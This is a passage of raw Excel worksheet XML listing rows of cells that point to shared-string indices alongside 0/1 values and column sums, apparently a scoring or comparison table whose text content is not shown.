      <c r="B5" s="3" t="s">
        <v>187</v>
      </c>
      <c r="C5" s="3" t="s">
        <v>187</v>
      </c>
      <c r="D5">
        <v>1</v>
      </c>
      <c r="E5">
        <v>1</v>
      </c>
      <c r="F5" s="3" t="s">
        <v>187</v>
      </c>
      <c r="G5">
        <v>1</v>
      </c>
      <c r="H5">
        <v>1</v>
      </c>
    </row>
    <row r="6" spans="1:8" ht="82.8" x14ac:dyDescent="0.25">
      <c r="A6" s="3" t="s">
        <v>934</v>
      </c>
      <c r="B6" s="3" t="s">
        <v>24</v>
      </c>
      <c r="C6" s="3" t="s">
        <v>827</v>
      </c>
      <c r="D6">
        <v>1</v>
      </c>
      <c r="E6">
        <v>1</v>
      </c>
      <c r="F6" s="3" t="s">
        <v>1021</v>
      </c>
      <c r="G6">
        <v>1</v>
      </c>
      <c r="H6">
        <v>0</v>
      </c>
    </row>
    <row r="7" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A7" s="3" t="s">
        <v>935</v>
      </c>
      <c r="B7" s="3" t="s">
        <v>936</v>
      </c>
      <c r="C7" s="3" t="s">
        <v>1007</v>
      </c>
      <c r="D7">
        <v>1</v>
      </c>
      <c r="E7">
        <v>0</v>
      </c>
      <c r="F7" s="3" t="s">
        <v>1028</v>
      </c>
      <c r="G7">
        <v>1</v>
      </c>
      <c r="H7">
        <v>0</v>
      </c>
    </row>
    <row r="8" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A8" s="3" t="s">
        <v>937</v>
      </c>
      <c r="B8" s="3" t="s">
        <v>938</v>
      </c>
      <c r="C8" s="3" t="s">
        <v>938</v>
      </c>
      <c r="D8">
        <v>1</v>
      </c>
      <c r="E8">
        <v>1</v>
      </c>
      <c r="F8" s="3" t="s">
        <v>938</v>
      </c>
      <c r="G8">
        <v>1</v>
      </c>
      <c r="H8">
        <v>1</v>
      </c>
    </row>
    <row r="9" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A9" s="3" t="s">
        <v>939</v>
      </c>
      <c r="B9" s="3"/>
      <c r="C9" s="3"/>
      <c r="F9" s="3"/>
    </row>
    <row r="10" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A10" s="3" t="s">
        <v>940</v>
      </c>
      <c r="B10" s="3"/>
      <c r="C10" s="3"/>
      <c r="F10" s="3"/>
    </row>
    <row r="11" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A11" s="3" t="s">
        <v>941</v>
      </c>
      <c r="B11" s="3"/>
      <c r="C11" s="3"/>
      <c r="F11" s="3"/>
    </row>
    <row r="12" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A12" s="3" t="s">
        <v>942</v>
      </c>
      <c r="B12" s="3"/>
      <c r="C12" s="3"/>
      <c r="F12" s="3"/>
    </row>
    <row r="13" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A13" s="3" t="s">
        <v>84</v>
      </c>
      <c r="B13" s="3" t="s">
        <v>114</v>
      </c>
      <c r="C13" s="3" t="s">
        <v>115</v>
      </c>
      <c r="D13">
        <v>1</v>
      </c>
      <c r="E13">
        <v>0</v>
      </c>
      <c r="F13" s="3" t="s">
        <v>116</v>
      </c>
      <c r="G13">
        <v>0</v>
      </c>
      <c r="H13">
        <v>0</v>
      </c>
    </row>
    <row r="14" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A14" s="3" t="s">
        <v>943</v>
      </c>
      <c r="B14" s="3" t="s">
        <v>944</v>
      </c>
      <c r="C14" s="3" t="s">
        <v>944</v>
      </c>
      <c r="D14">
        <v>1</v>
      </c>
      <c r="E14">
        <v>1</v>
      </c>
      <c r="F14" s="3" t="s">
        <v>944</v>
      </c>
      <c r="G14">
        <v>1</v>
      </c>
      <c r="H14">
        <v>1</v>
      </c>
    </row>
    <row r="15" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A15" s="3" t="s">
        <v>945</v>
      </c>
      <c r="B15" s="3" t="s">
        <v>946</v>
      </c>
      <c r="C15" s="3" t="s">
        <v>946</v>
      </c>
      <c r="D15">
        <v>1</v>
      </c>
      <c r="E15">
        <v>1</v>
      </c>
      <c r="F15" s="3" t="s">
        <v>946</v>
      </c>
      <c r="G15">
        <v>1</v>
      </c>
      <c r="H15">
        <v>1</v>
      </c>
    </row>
    <row r="16" spans="1:8" ht="69" x14ac:dyDescent="0.25">
      <c r="A16" s="3" t="s">
        <v>947</v>
      </c>
      <c r="B16" s="3" t="s">
        <v>948</v>
      </c>
      <c r="C16" s="3" t="s">
        <v>1008</v>
      </c>
      <c r="D16">
        <v>1</v>
      </c>
      <c r="E16">
        <v>0</v>
      </c>
      <c r="F16" s="3" t="s">
        <v>948</v>
      </c>
      <c r="G16">
        <v>1</v>
      </c>
      <c r="H16">
        <v>1</v>
      </c>
    </row>
    <row r="17" spans="1:8" ht="69" x14ac:dyDescent="0.25">
      <c r="A17" s="3" t="s">
        <v>949</v>
      </c>
      <c r="B17" s="3" t="s">
        <v>950</v>
      </c>
      <c r="C17" s="3" t="s">
        <v>1009</v>
      </c>
      <c r="D17">
        <v>1</v>
      </c>
      <c r="E17">
        <v>1</v>
      </c>
      <c r="F17" s="3" t="s">
        <v>950</v>
      </c>
      <c r="G17">
        <v>1</v>
      </c>
      <c r="H17">
        <v>1</v>
      </c>
    </row>
    <row r="18" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A18" s="3" t="s">
        <v>951</v>
      </c>
      <c r="B18" s="3" t="s">
        <v>952</v>
      </c>
      <c r="C18" s="3" t="s">
        <v>26</v>
      </c>
      <c r="D18">
        <v>1</v>
      </c>
      <c r="E18">
        <v>1</v>
      </c>
      <c r="F18" s="3" t="s">
        <v>26</v>
      </c>
      <c r="G18">
        <v>1</v>
      </c>
      <c r="H18">
        <v>1</v>
      </c>
    </row>
    <row r="19" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A19" s="3" t="s">
        <v>953</v>
      </c>
      <c r="B19" s="3" t="s">
        <v>954</v>
      </c>
      <c r="C19" s="3" t="s">
        <v>27</v>
      </c>
      <c r="D19">
        <v>1</v>
      </c>
      <c r="E19">
        <v>1</v>
      </c>
      <c r="F19" s="3" t="s">
        <v>27</v>
      </c>
      <c r="G19">
        <v>1</v>
      </c>
      <c r="H19">
        <v>1</v>
      </c>
    </row>
    <row r="20" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A20" s="3" t="s">
        <v>955</v>
      </c>
      <c r="B20" s="3" t="s">
        <v>956</v>
      </c>
      <c r="C20" s="3" t="s">
        <v>956</v>
      </c>
      <c r="D20">
        <v>1</v>
      </c>
      <c r="E20">
        <v>1</v>
      </c>
      <c r="F20" s="3" t="s">
        <v>956</v>
      </c>
      <c r="G20">
        <v>1</v>
      </c>
      <c r="H20">
        <v>1</v>
      </c>
    </row>
    <row r="21" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A21" s="3" t="s">
        <v>957</v>
      </c>
      <c r="B21" s="3" t="s">
        <v>958</v>
      </c>
      <c r="C21" s="3" t="s">
        <v>958</v>
      </c>
      <c r="D21">
        <v>1</v>
      </c>
      <c r="E21">
        <v>1</v>
      </c>
      <c r="F21" s="3" t="s">
        <v>958</v>
      </c>
      <c r="G21">
        <v>1</v>
      </c>
      <c r="H21">
        <v>1</v>
      </c>
    </row>
    <row r="22" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A22" s="3" t="s">
        <v>959</v>
      </c>
      <c r="B22" s="3" t="s">
        <v>960</v>
      </c>
      <c r="C22" s="3" t="s">
        <v>960</v>
      </c>
      <c r="D22">
        <v>1</v>
      </c>
      <c r="E22">
        <v>1</v>
      </c>
      <c r="F22" s="3" t="s">
        <v>960</v>
      </c>
      <c r="G22">
        <v>1</v>
      </c>
      <c r="H22">
        <v>1</v>
      </c>
    </row>
    <row r="23" spans="1:8" ht="69" x14ac:dyDescent="0.25">
      <c r="A23" s="3" t="s">
        <v>961</v>
      </c>
      <c r="B23" s="3" t="s">
        <v>962</v>
      </c>
      <c r="C23" s="3" t="s">
        <v>1010</v>
      </c>
      <c r="D23">
        <v>1</v>
      </c>
      <c r="E23">
        <v>1</v>
      </c>
      <c r="F23" s="3" t="s">
        <v>962</v>
      </c>
      <c r="G23">
        <v>1</v>
      </c>
      <c r="H23">
        <v>1</v>
      </c>
    </row>
    <row r="24" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A24" s="3" t="s">
        <v>963</v>
      </c>
      <c r="B24" s="3" t="s">
        <v>964</v>
      </c>
      <c r="C24" s="3" t="s">
        <v>964</v>
      </c>
      <c r="D24">
        <v>1</v>
      </c>
      <c r="E24">
        <v>1</v>
      </c>
      <c r="F24" s="3" t="s">
        <v>964</v>
      </c>
      <c r="G24">
        <v>1</v>
      </c>
      <c r="H24">
        <v>1</v>
      </c>
    </row>
    <row r="25" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A25" s="3" t="s">
        <v>886</v>
      </c>
      <c r="B25" s="3" t="s">
        <v>331</v>
      </c>
      <c r="C25" s="3" t="s">
        <v>331</v>
      </c>
      <c r="D25">
        <v>1</v>
      </c>
      <c r="E25">
        <v>1</v>
      </c>
      <c r="F25" s="3" t="s">
        <v>331</v>
      </c>
      <c r="G25">
        <v>1</v>
      </c>
      <c r="H25">
        <v>1</v>
      </c>
    </row>
    <row r="26" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A26" s="3" t="s">
        <v>965</v>
      </c>
      <c r="B26" s="3" t="s">
        <v>966</v>
      </c>
      <c r="C26" s="3" t="s">
        <v>1011</v>
      </c>
      <c r="D26">
        <v>1</v>
      </c>
      <c r="E26">
        <v>1</v>
      </c>
      <c r="F26" s="3" t="s">
        <v>966</v>
      </c>
      <c r="G26">
        <v>1</v>
      </c>
      <c r="H26">
        <v>1</v>
      </c>
    </row>
    <row r="27" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A27" s="3" t="s">
        <v>967</v>
      </c>
      <c r="B27" s="3" t="s">
        <v>968</v>
      </c>
      <c r="C27" s="3" t="s">
        <v>968</v>
      </c>
      <c r="D27">
        <v>1</v>
      </c>
      <c r="E27">
        <v>1</v>
      </c>
      <c r="F27" s="3" t="s">
        <v>968</v>
      </c>
      <c r="G27">
        <v>1</v>
      </c>
      <c r="H27">
        <v>1</v>
      </c>
    </row>
    <row r="28" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A28" s="3" t="s">
        <v>969</v>
      </c>
      <c r="B28" s="3" t="s">
        <v>970</v>
      </c>
      <c r="C28" s="3" t="s">
        <v>1012</v>
      </c>
      <c r="D28">
        <v>1</v>
      </c>
      <c r="E28">
        <v>1</v>
      </c>
      <c r="F28" s="3" t="s">
        <v>1022</v>
      </c>
      <c r="G28">
        <v>1</v>
      </c>
      <c r="H28">
        <v>1</v>
      </c>
    </row>
    <row r="29" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A29" s="3" t="s">
        <v>971</v>
      </c>
      <c r="B29" s="3" t="s">
        <v>972</v>
      </c>
      <c r="C29" s="3" t="s">
        <v>1013</v>
      </c>
      <c r="D29">
        <v>1</v>
      </c>
      <c r="E29">
        <v>1</v>
      </c>
      <c r="F29" s="3" t="s">
        <v>1013</v>
      </c>
      <c r="G29">
        <v>1</v>
      </c>
      <c r="H29">
        <v>1</v>
      </c>
    </row>
    <row r="30" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A30" s="3" t="s">
        <v>973</v>
      </c>
      <c r="B30" s="3" t="s">
        <v>974</v>
      </c>
      <c r="C30" s="3" t="s">
        <v>974</v>
      </c>
      <c r="D30">
        <v>1</v>
      </c>
      <c r="E30">
        <v>1</v>
      </c>
      <c r="F30" s="3" t="s">
        <v>974</v>
      </c>
      <c r="G30">
        <v>1</v>
      </c>
      <c r="H30">
        <v>1</v>
      </c>
    </row>
    <row r="31" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A31" s="3" t="s">
        <v>975</v>
      </c>
      <c r="B31" s="3" t="s">
        <v>976</v>
      </c>
      <c r="C31" s="3" t="s">
        <v>1014</v>
      </c>
      <c r="D31">
        <v>1</v>
      </c>
      <c r="E31">
        <v>1</v>
      </c>
      <c r="F31" s="3" t="s">
        <v>1014</v>
      </c>
      <c r="G31">
        <v>1</v>
      </c>
      <c r="H31">
        <v>1</v>
      </c>
    </row>
    <row r="32" spans="1:8" ht="124.2" x14ac:dyDescent="0.25">
      <c r="A32" s="3" t="s">
        <v>977</v>
      </c>
      <c r="B32" s="3" t="s">
        <v>978</v>
      </c>
      <c r="C32" s="3" t="s">
        <v>1015</v>
      </c>
      <c r="D32">
        <v>1</v>
      </c>
      <c r="E32">
        <v>1</v>
      </c>
      <c r="F32" s="3" t="s">
        <v>1023</v>
      </c>
      <c r="G32">
        <v>1</v>
      </c>
      <c r="H32">
        <v>0</v>
      </c>
    </row>
    <row r="33" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A33" s="3" t="s">
        <v>979</v>
      </c>
      <c r="B33" s="3" t="s">
        <v>980</v>
      </c>
      <c r="C33" s="3" t="s">
        <v>1016</v>
      </c>
      <c r="D33">
        <v>1</v>
      </c>
      <c r="E33">
        <v>0</v>
      </c>
      <c r="F33" s="3" t="s">
        <v>1024</v>
      </c>
      <c r="G33">
        <v>1</v>
      </c>
      <c r="H33">
        <v>0</v>
      </c>
    </row>
    <row r="34" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A34" s="3" t="s">
        <v>981</v>
      </c>
      <c r="B34" s="3"/>
      <c r="C34" s="3"/>
      <c r="F34" s="3"/>
    </row>
    <row r="35" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A35" s="3" t="s">
        <v>982</v>
      </c>
      <c r="B35" s="3" t="s">
        <v>510</v>
      </c>
      <c r="C35" s="3" t="s">
        <v>1017</v>
      </c>
      <c r="D35">
        <v>1</v>
      </c>
      <c r="E35">
        <v>1</v>
      </c>
      <c r="F35" s="3" t="s">
        <v>1017</v>
      </c>
      <c r="G35">
        <v>1</v>
      </c>
      <c r="H35">
        <v>1</v>
      </c>
    </row>
    <row r="36" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A36" s="3" t="s">
        <v>983</v>
      </c>
      <c r="B36" s="3" t="s">
        <v>984</v>
      </c>
      <c r="C36" s="3" t="s">
        <v>1018</v>
      </c>
      <c r="D36">
        <v>1</v>
      </c>
      <c r="E36">
        <v>0</v>
      </c>
      <c r="F36" s="3" t="s">
        <v>1025</v>
      </c>
      <c r="G36">
        <v>1</v>
      </c>
      <c r="H36">
        <v>0</v>
      </c>
    </row>
    <row r="37" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A37" s="3" t="s">
        <v>985</v>
      </c>
      <c r="B37" s="3"/>
      <c r="C37" s="3"/>
      <c r="F37" s="3"/>
    </row>
    <row r="38" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A38" s="3" t="s">
        <v>982</v>
      </c>
      <c r="B38" s="3" t="s">
        <v>510</v>
      </c>
      <c r="C38" s="3" t="s">
        <v>1017</v>
      </c>
      <c r="D38">
        <v>1</v>
      </c>
      <c r="E38">
        <v>1</v>
      </c>
      <c r="F38" s="3" t="s">
        <v>1017</v>
      </c>
      <c r="G38">
        <v>1</v>
      </c>
      <c r="H38">
        <v>1</v>
      </c>
    </row>
    <row r="39" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A39" s="3" t="s">
        <v>808</v>
      </c>
      <c r="B39" s="3" t="s">
        <v>36</v>
      </c>
      <c r="C39" s="3" t="s">
        <v>37</v>
      </c>
      <c r="D39">
        <v>1</v>
      </c>
      <c r="E39">
        <v>0</v>
      </c>
      <c r="F39" s="3" t="s">
        <v>36</v>
      </c>
      <c r="G39">
        <v>1</v>
      </c>
      <c r="H39">
        <v>1</v>
      </c>
    </row>
    <row r="40" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A40" s="3" t="s">
        <v>986</v>
      </c>
      <c r="B40" s="3" t="s">
        <v>987</v>
      </c>
      <c r="C40" s="3" t="s">
        <v>1019</v>
      </c>
      <c r="D40">
        <v>1</v>
      </c>
      <c r="E40">
        <v>0</v>
      </c>
      <c r="F40" s="3" t="s">
        <v>1026</v>
      </c>
      <c r="G40">
        <v>0</v>
      </c>
      <c r="H40">
        <v>0</v>
      </c>
    </row>
    <row r="41" spans="1:8" ht="69" x14ac:dyDescent="0.25">
      <c r="A41" s="3" t="s">
        <v>988</v>
      </c>
      <c r="B41" s="3" t="s">
        <v>989</v>
      </c>
      <c r="C41" s="3" t="s">
        <v>1020</v>
      </c>
      <c r="D41">
        <v>1</v>
      </c>
      <c r="E41">
        <v>1</v>
      </c>
      <c r="F41" s="3" t="s">
        <v>1931</v>
      </c>
      <c r="G41">
        <v>1</v>
      </c>
      <c r="H41">
        <v>0</v>
      </c>
    </row>
    <row r="42" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A42" s="3" t="s">
        <v>808</v>
      </c>
      <c r="B42" s="3" t="s">
        <v>36</v>
      </c>
      <c r="C42" s="3" t="s">
        <v>37</v>
      </c>
      <c r="D42">
        <v>1</v>
      </c>
      <c r="E42">
        <v>0</v>
      </c>
      <c r="F42" s="3" t="s">
        <v>37</v>
      </c>
      <c r="G42">
        <v>1</v>
      </c>
      <c r="H42">
        <v>0</v>
      </c>
    </row>
    <row r="43" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A43" s="3" t="s">
        <v>990</v>
      </c>
      <c r="B43" s="3" t="s">
        <v>991</v>
      </c>
      <c r="C43" s="3" t="s">
        <v>991</v>
      </c>
      <c r="D43">
        <v>1</v>
      </c>
      <c r="E43">
        <v>1</v>
      </c>
      <c r="F43" s="3" t="s">
        <v>1932</v>
      </c>
      <c r="G43">
        <v>1</v>
      </c>
      <c r="H43">
        <v>0</v>
      </c>
    </row>
    <row r="44" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A44" s="3" t="s">
        <v>965</v>
      </c>
      <c r="B44" s="3" t="s">
        <v>966</v>
      </c>
      <c r="C44" s="3" t="s">
        <v>1011</v>
      </c>
      <c r="D44">
        <v>1</v>
      </c>
      <c r="E44">
        <v>1</v>
      </c>
      <c r="F44" s="3" t="s">
        <v>966</v>
      </c>
      <c r="G44">
        <v>1</v>
      </c>
      <c r="H44">
        <v>1</v>
      </c>
    </row>
    <row r="45" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A45" s="3" t="s">
        <v>992</v>
      </c>
      <c r="B45" s="3" t="s">
        <v>993</v>
      </c>
      <c r="C45" s="9" t="s">
        <v>1929</v>
      </c>
      <c r="D45">
        <v>0</v>
      </c>
      <c r="E45">
        <v>0</v>
      </c>
      <c r="F45" s="3" t="s">
        <v>993</v>
      </c>
      <c r="G45">
        <v>1</v>
      </c>
      <c r="H45">
        <v>1</v>
      </c>
    </row>
    <row r="46" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A46" s="3" t="s">
        <v>994</v>
      </c>
      <c r="B46" s="3" t="s">
        <v>995</v>
      </c>
      <c r="C46" s="3" t="s">
        <v>1930</v>
      </c>
      <c r="D46">
        <v>0</v>
      </c>
      <c r="E46">
        <v>0</v>
      </c>
      <c r="F46" s="3" t="s">
        <v>1027</v>
      </c>
      <c r="G46">
        <v>1</v>
      </c>
      <c r="H46">
        <v>0</v>
      </c>
    </row>
    <row r="47" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A47" s="3" t="s">
        <v>992</v>
      </c>
      <c r="B47" s="3" t="s">
        <v>993</v>
      </c>
      <c r="C47" s="9" t="s">
        <v>1929</v>
      </c>
      <c r="D47">
        <v>0</v>
      </c>
      <c r="E47">
        <v>0</v>
      </c>
      <c r="F47" s="3" t="s">
        <v>993</v>
      </c>
      <c r="G47">
        <v>1</v>
      </c>
      <c r="H47">
        <v>1</v>
      </c>
    </row>
    <row r="48" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A48" s="3" t="s">
        <v>810</v>
      </c>
      <c r="B48" s="3" t="s">
        <v>40</v>
      </c>
      <c r="C48" s="3" t="s">
        <v>40</v>
      </c>
      <c r="D48">
        <v>1</v>
      </c>
      <c r="E48">
        <v>1</v>
      </c>
      <c r="F48" s="3" t="s">
        <v>40</v>
      </c>
      <c r="G48">
        <v>1</v>
      </c>
      <c r="H48">
        <v>1</v>
      </c>
    </row>
    <row r="49" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A49" s="3" t="s">
        <v>996</v>
      </c>
      <c r="B49" s="3" t="s">
        <v>997</v>
      </c>
      <c r="C49" s="3" t="s">
        <v>997</v>
      </c>
      <c r="D49">
        <v>1</v>
      </c>
      <c r="E49">
        <v>1</v>
      </c>
      <c r="F49" s="3" t="s">
        <v>997</v>
      </c>
      <c r="G49">
        <v>1</v>
      </c>
      <c r="H49">
        <v>1</v>
      </c>
    </row>
    <row r="50" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A50" s="3" t="s">
        <v>998</v>
      </c>
      <c r="B50" s="3"/>
      <c r="C50" s="3"/>
      <c r="F50" s="3"/>
    </row>
    <row r="51" spans="1:8" ht="69" x14ac:dyDescent="0.25">
      <c r="A51" s="3" t="s">
        <v>999</v>
      </c>
      <c r="B51" s="3"/>
      <c r="C51" s="3"/>
      <c r="F51" s="3"/>
    </row>
    <row r="52" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A52" s="3" t="s">
        <v>998</v>
      </c>
      <c r="B52" s="3"/>
      <c r="C52" s="3"/>
      <c r="F52" s="3"/>
    </row>
    <row r="53" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A53" s="3" t="s">
        <v>1000</v>
      </c>
      <c r="B53" s="3"/>
      <c r="C53" s="3"/>
      <c r="F53" s="3"/>
    </row>
    <row r="54" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A54" s="3" t="s">
        <v>1001</v>
      </c>
      <c r="B54" s="3"/>
      <c r="C54" s="3"/>
      <c r="F54" s="3"/>
    </row>
    <row r="55" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A55" s="3" t="s">
        <v>1002</v>
      </c>
      <c r="B55" s="3"/>
      <c r="C55" s="3"/>
      <c r="F55" s="3"/>
    </row>
    <row r="56" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A56" s="3" t="s">
        <v>1001</v>
      </c>
      <c r="B56" s="3"/>
      <c r="C56" s="3"/>
      <c r="F56" s="3"/>
    </row>
    <row r="57" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A57" s="3" t="s">
        <v>1003</v>
      </c>
      <c r="B57" s="3"/>
      <c r="C57" s="3"/>
      <c r="F57" s="3"/>
    </row>
    <row r="58" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A58" s="3" t="s">
        <v>1001</v>
      </c>
      <c r="B58" s="3"/>
      <c r="C58" s="3"/>
      <c r="F58" s="3"/>
    </row>
    <row r="59" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A59" s="3" t="s">
        <v>1004</v>
      </c>
      <c r="B59" s="3" t="s">
        <v>1005</v>
      </c>
      <c r="C59" s="3" t="s">
        <v>1005</v>
      </c>
      <c r="D59">
        <v>1</v>
      </c>
      <c r="E59">
        <v>1</v>
      </c>
      <c r="F59" s="3" t="s">
        <v>1005</v>
      </c>
      <c r="G59">
        <v>1</v>
      </c>
      <c r="H59">
        <v>1</v>
      </c>
    </row>
    <row r="60" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A60" s="3" t="s">
        <v>1006</v>
      </c>
      <c r="B60" s="3"/>
      <c r="C60" s="3"/>
      <c r="F60" s="3"/>
    </row>
    <row r="61" spans="1:8" s="6" customFormat="1" ht="17.399999999999999" x14ac:dyDescent="0.3">
      <c r="A61" s="18" t="s">
        <v>41</v>
      </c>
      <c r="D61" s="6">
        <f>SUM(D4:D59)</f>
        <v>38</v>
      </c>
      <c r="E61" s="6">
        <f t="shared" ref="E61:H61" si="0">SUM(E4:E59)</f>
        <v>30</v>
      </c>
      <c r="F61" s="6">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="G61" s="6">
        <f t="shared" si="0"/>
        <v>39</v>
      </c>
      <c r="H61" s="6">
        <f t="shared" si="0"/>
        <v>30</v>
      </c>
    </row>
    <row r="64" spans="1:8" ht="25.2" x14ac:dyDescent="0.45">
      <c r="A64" s="25" t="s">
        <v>44</v>
      </c>
      <c r="B64" s="25"/>
      <c r="C64" s="25"/>
      <c r="D64" s="25"/>
      <c r="E64" s="25"/>
      <c r="F64" s="25"/>
      <c r="G64" s="25"/>
      <c r="H64" s="25"/>
    </row>
    <row r="65" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A65" s="4" t="s">
        <v>1</v>
      </c>
      <c r="B65" s="4" t="s">
        <v>2</v>
      </c>
      <c r="C65" s="4" t="s">
        <v>3</v>
      </c>
      <c r="D65" s="4" t="s">
        <v>5</v>
      </c>
      <c r="E65" s="4" t="s">
        <v>6</v>
      </c>
      <c r="F65" s="4" t="s">
        <v>4</v>
      </c>
      <c r="G65" s="4" t="s">
        <v>5</v>
      </c>
      <c r="H65" s="4" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="66" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A66" s="3" t="s">
        <v>45</v>
      </c>
      <c r="B66" s="3" t="s">
        <v>56</v>
      </c>
      <c r="C66" s="3" t="s">
        <v>45</v>
      </c>
      <c r="D66">
        <v>1</v>
      </c>
      <c r="E66">
        <v>1</v>
      </c>
      <c r="F66" s="3" t="s">
        <v>45</v>
      </c>
      <c r="G66">
        <v>1</v>
      </c>
      <c r="H66">
        <v>1</v>
      </c>
    </row>
    <row r="67" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A67" s="3" t="s">
        <v>46</v>
      </c>
      <c r="B67" s="3" t="s">
        <v>57</v>
      </c>
      <c r="C67" s="3" t="s">
        <v>57</v>
      </c>
      <c r="D67">
        <v>1</v>
      </c>
      <c r="E67">
        <v>1</v>
      </c>
      <c r="F67" s="3" t="s">
        <v>57</v>
      </c>
      <c r="G67">
        <v>1</v>
      </c>
      <c r="H67">
        <v>1</v>
      </c>
    </row>
    <row r="68" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A68" s="3" t="s">
        <v>1591</v>
      </c>
      <c r="B68" s="3" t="s">
        <v>1335</v>
      </c>
      <c r="C68" s="3" t="s">
        <v>1592</v>
      </c>
      <c r="D68">
        <v>1</v>
      </c>
      <c r="E68">
        <v>0</v>
      </c>
      <c r="F68" s="3" t="s">
        <v>1614</v>
      </c>
      <c r="G68">
        <v>1</v>
      </c>
      <c r="H68">
        <v>0</v>
      </c>
    </row>
    <row r="69" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A69" s="3" t="s">
        <v>1689</v>
      </c>
      <c r="B69" s="3" t="s">
        <v>1373</v>
      </c>
      <c r="C69" s="3" t="s">
        <v>1373</v>
      </c>
      <c r="D69">
        <v>1</v>
      </c>
      <c r="E69">
        <v>1</v>
      </c>
      <c r="F69" s="3" t="s">
        <v>1373</v>
      </c>
      <c r="G69">
        <v>1</v>
      </c>
      <c r="H69">
        <v>1</v>
      </c>
    </row>
    <row r="70" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A70" s="3" t="s">
        <v>1211</v>
      </c>
      <c r="B70" s="3" t="s">
        <v>60</v>
      </c>
      <c r="C70" s="3" t="s">
        <v>73</v>
      </c>
      <c r="D70">
        <v>1</v>
      </c>
      <c r="E70">
        <v>0</v>
      </c>
      <c r="F70" s="3" t="s">
        <v>1074</v>
      </c>
      <c r="G70">
        <v>1</v>
      </c>
      <c r="H70">
        <v>1</v>
      </c>
    </row>
    <row r="71" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A71" s="3" t="s">
        <v>1596</v>
      </c>
      <c r="B71" s="3" t="s">
        <v>62</v>
      </c>
      <c r="C71" s="3" t="s">
        <v>62</v>
      </c>
      <c r="D71">
        <v>1</v>
      </c>
      <c r="E71">
        <v>1</v>
      </c>
      <c r="F71" s="3" t="s">
        <v>62</v>
      </c>
      <c r="G71">
        <v>1</v>
      </c>
      <c r="H71">
        <v>1</v>
      </c>
    </row>
    <row r="72" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A72" s="3" t="s">
        <v>1031</v>
      </c>
      <c r="B72" s="3" t="s">
        <v>1032</v>
      </c>
      <c r="C72" s="3" t="s">
        <v>1075</v>
      </c>
      <c r="D72">
        <v>1</v>
      </c>
      <c r="E72">
        <v>1</v>
      </c>
      <c r="F72" s="3" t="s">
        <v>1084</v>
      </c>
      <c r="G72">
        <v>1</v>
      </c>
      <c r="H72">
        <v>1</v>
      </c>
    </row>
    <row r="73" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A73" s="3"/>
      <c r="B73" s="3" t="s">
        <v>1886</v>
      </c>
      <c r="C73" s="3" t="s">
        <v>1886</v>
      </c>
      <c r="D73" s="19">
        <v>1</v>
      </c>
      <c r="E73" s="19">
        <v>1</v>
      </c>
      <c r="F73" s="3" t="s">
        <v>1263</v>
      </c>
      <c r="G73" s="19">
        <v>1</v>
      </c>
      <c r="H73" s="19">
        <v>0</v>
      </c>
    </row>
    <row r="74" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A74" s="3" t="s">
        <v>1807</v>
      </c>
      <c r="B74" s="3" t="s">
